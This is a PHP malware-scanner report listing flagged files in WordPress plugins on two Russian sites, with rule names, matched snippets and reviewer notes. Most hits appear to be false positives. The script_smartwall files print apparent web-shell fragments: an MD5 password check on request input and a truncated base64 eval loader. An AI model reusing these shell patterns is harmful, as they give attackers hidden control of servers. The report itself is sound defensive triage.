//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-20 14:03:34 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
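Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request. Note: `extract($_POST)` lets request fields overwrite local variables, so the real impact depends on what the code after line 12 does with them; reading only the expected keys explicitly removes the risk. |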
extract($_POST)
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
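Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) Note: the matched text is the four-character string `nc-l`, short enough to occur inside unrelated identifiers or text; inspect line 383 before acting on this finding. |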
nc-l
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Warns: 3
| Description | Match |
|---|
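Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code. Note: the arguments in the matches below run in plain ascending order (0, 1, 2, …), which looks more like a character lookup table than an encoded payload; confirm in the file. |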
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
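Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] Note: the match is a variable-function call taken from `$val['func']`; whether `$val` is defined by the plugin or can be influenced by a request is not visible here, so check how it is populated before line 98. |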
$val['func']($this->newData)
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:10 Modified: 2020-07-24 20:05:47 Dangers: 1
| Description | Match |
|---|
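Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] Note: the match `riny` is `eval` written in ROT13; a four-character match can also occur inside ordinary words, so confirm at line 177 that it is actually passed through `str_rot13` and executed. |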
riny
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:43 Warns: 1 Dangers: 1
| Description | Match |
|---|
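Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check, a pattern typically used in web shells. Note: the match compares the MD5 of a request parameter with a hard-coded digest, and the same digest is reported in the other script_smartwall files in this report, which suggests one kit copied across sites; review the whole directory as a unit. |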
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:43 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/krasnoyarsk/data/www/intim-krasnoyarsk.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 15:47:32 Modified: 2020-09-27 15:47:42 Warns: 2 Dangers: 3
| Description | Match |
|---|
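Exploit base64_long Line: 2 Warning Long Base64-encoded text is usually used to obfuscate malicious code. Note: the `eval` finding below shows this same string being passed through a randomly named function and then evaluated on line 2, so this file warrants priority review, in isolation and without executing it. |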
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/456/5eb/4565eb438f07207bac9866637c6b5959.php Size: 26.68 kB Created: 2020-11-28 22:00:21 Modified: 2020-11-28 22:00:21 Dangers: 1
| Description | Match |
|---|
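Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) Note: the matched text is only the word `exploit` inside a cached page fragment, which may be ordinary page content; read line 161 before treating the file as malicious. |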
exploit
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/583/e34/583e34ec8c9d0a35da664819edd1bc07.php Size: 80.01 kB Created: 2020-11-28 22:01:15 Modified: 2020-11-28 22:01:15 Warns: 1 Dangers: 4
| Description | Match |
|---|
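Exploit base64_long Line: 694 Warning Long Base64-encoded text is usually used to obfuscate malicious code. Note: the visible start of this string decodes to a JSON object whose first keys are `homeurl` and `resultstype`, which looks like cached plugin settings rather than code; the short `Sign` matches below are reported on the same line 694 and may simply be substrings of this text. |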
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguaW5kaXZpZHVhbGtpLW5pemhuaWotbm92Z29yb2QyLnJ1LyIsCiAgICAicmVzdWx0c3R5cGUiOiAidmVydGljYWwiLAogICAgInJlc3VsdHNwb3NpdGlvbiI6ICJob3ZlciIsCiAgICAicmVzdWx0c1NuYXBUbyI6ICJsZWZ0IiwKICAgICJyZXN1bHRzIjogewogICAgICAgICJ3aWR0aCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfdGFibGV0IjogImF1dG8iLAogICAgICAgICJ3aWR0aF9waG9uZSI6ICJhdXRvIgogICAgfSwKICAgICJpdGVtc2NvdW50IjogNCwKICAgICJpbWFnZXdpZHRoIjogNzAsCiAgICAiaW1hZ2VoZWlnaHQiOiA3MCwKICAgICJyZXN1bHRpdGVtaGVpZ2h0IjogImF1dG8iLAogICAgInN...
| Sign 7830f7a6 Line: 694 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign 7f5d33bf Line: 694 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign d30fc49e Line: 694 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 694 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/94b/439/94b439a06468ad5be49fd773b8f6a56a.php Size: 509.13 kB Created: 2020-11-28 22:01:06 Modified: 2020-11-28 22:01:06 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/nogroup/1f6/2f0/1f62f0b7fd819c9338c5b451dfebcc33.php Size: 79.77 kB Created: 2020-11-28 22:01:40 Modified: 2020-11-28 22:01:40 Warns: 1 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 694 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguaW5kaXZpZHVhbGtpLW5pemhuaWotbm92Z29yb2QyLnJ1LyIsCiAgICAicmVzdWx0c3R5cGUiOiAidmVydGljYWwiLAogICAgInJlc3VsdHNwb3NpdGlvbiI6ICJob3ZlciIsCiAgICAicmVzdWx0c1NuYXBUbyI6ICJsZWZ0IiwKICAgICJyZXN1bHRzIjogewogICAgICAgICJ3aWR0aCI6ICJhdXRvIiwKICAgICAgICAid2lkdGhfdGFibGV0IjogImF1dG8iLAogICAgICAgICJ3aWR0aF9waG9uZSI6ICJhdXRvIgogICAgfSwKICAgICJpdGVtc2NvdW50IjogNCwKICAgICJpbWFnZXdpZHRoIjogNzAsCiAgICAiaW1hZ2VoZWlnaHQiOiA3MCwKICAgICJyZXN1bHRpdGVtaGVpZ2h0IjogImF1dG8iLAogICAgInN...
| Sign 7830f7a6 Line: 694 Dangerous Malware Signature (hash: 7830f7a6) |
N0YX
| Sign 7f5d33bf Line: 694 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign d30fc49e Line: 694 Dangerous Malware Signature (hash: d30fc49e) |
b3Blb
| Sign d97f004d Line: 694 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/cache/fragment/global-nogroup/f55/b98/f55b98702c61c96429f9ed889e85823d.php Size: 50.23 kB Created: 2020-11-28 22:02:59 Modified: 2020-11-28 22:02:59 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 161 Dangerous Malware Signature (hash: 11413268) |
exploit
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-08-13 14:54:23 Modified: 2020-08-14 10:30:33 Warns: 1
| Description | Match |
|---|
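Exploit double_var2 Line: 1185 Warning The double-variable (variable variable) technique is usually used to obfuscate malicious code. Note: the match uses a descriptively named variable, `$gloabl_filter_ids_name`; check at line 1185 whether that name is built from plugin data or from request input. |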
${$gloabl_filter_ids_name}
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-08-13 14:54:24 Modified: 2020-08-14 10:30:33 Dangers: 1
| Description | Match |
|---|
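Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells that are code-golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] Note: the match is a variable-function call taken from `$validation_rule['validation_class']`; confirm at line 140 that the rule table is defined in the plugin's own code and compare the file with the vendor's release. |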
$validation_rule['validation_class']()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Warns: 1
| Description | Match |
|---|
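Function system Warning Potentially dangerous function `system` [https://www.php.net/system] Note: in the excerpt below the word `system` is followed by a parenthesis inside a translatable help string passed to `__()`, not a call to PHP's `system()`. |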
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
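Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) Note: the matched text is only the word `suhosin`, the name of a PHP hardening extension; a mention of it is not malicious by itself, so check what line 328 does with it. |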
suhosin
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 2
| Description | Match |
|---|
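Exploit execution2 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] Note: in the excerpt below, `array_filter($allPatterns)` is called without a callback and `$_GET` is only tested with `array_key_exists`; no request value is visibly passed to a callable, so confirm in the file before treating this as RCE. |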
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Dangers: 1
| Description | Match |
|---|
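Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) Note: the matched text is an error-suppressed `preg_replace` call, and the file path indicates a vendored regex wrapper library; check the pattern argument at line 27 and compare the file with the library's published source. |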
@preg_replace
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:21:15 Modified: 2021-05-16 20:21:15 Warns: 1
| Description | Match |
|---|
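Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] Note: in the excerpt below `exec(` appears as a quoted string in a list alongside `test(`, `toSource(` and `toString(`, i.e. as text the minifier matches against, not as a call to PHP's `exec()`. |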
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
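Exploit hacked_by Line: 7576 Dangerous Hacker credits. Note: this is a plain string match on the phrase below, which can also appear in an ordinary developer comment; read line 7576 and compare the file with the vendor's PHPExcel release before treating it as a defacement marker. |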
Hacked by
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-08-13 14:54:26 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2021-03-14 17:36:50 Modified: 2021-03-14 17:36:50 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2021-03-14 17:36:45 Modified: 2021-03-14 17:36:45 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2021-03-14 17:36:46 Modified: 2021-03-14 17:36:46 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2021-03-14 17:36:58 Modified: 2021-03-14 17:36:58 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2021-03-14 17:36:57 Modified: 2021-03-14 17:36:57 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/nn/data/www/individualki-nizhnij-novgorod2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-08-13 14:54:27 Modified: 2020-08-14 10:30:34 Dangers: 1
|
